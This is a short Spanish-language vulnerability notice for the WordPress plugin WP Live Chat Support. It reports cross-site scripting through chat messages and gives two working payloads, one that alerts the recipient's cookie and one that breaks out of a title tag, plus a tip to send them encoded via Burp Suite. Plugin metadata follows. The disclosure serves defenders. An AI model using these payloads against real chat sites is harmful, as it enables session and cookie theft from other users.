Vulnerabilidad Plugin: WP Live Chat Support

Enviar cualquiera de los siguientes mensajes a través de chat ejecuta JavaScript no deseado en la ventana de chat de los receptores:

<img src=http://www.google.fr/images/srpr/logo3w.png onload=alert(this.ownerDocument.cookie) width=0 height= 0 />

x”</title><img src%3dx onerror%3dalert(1)>

Si tiene problemas para reproducir, puede intentar enviarlos a través de Burp Suite, que debería hacer el truco ya que la carga útil necesita ser codificada.

Ficha del Plugin

Versión Actual: 8.0.36
Requisitos: 4.4
Probado en WordPress: 5.2.2
Total Descargas: 1,563,080
Última actualización: 2019-07-05 6:55am GMT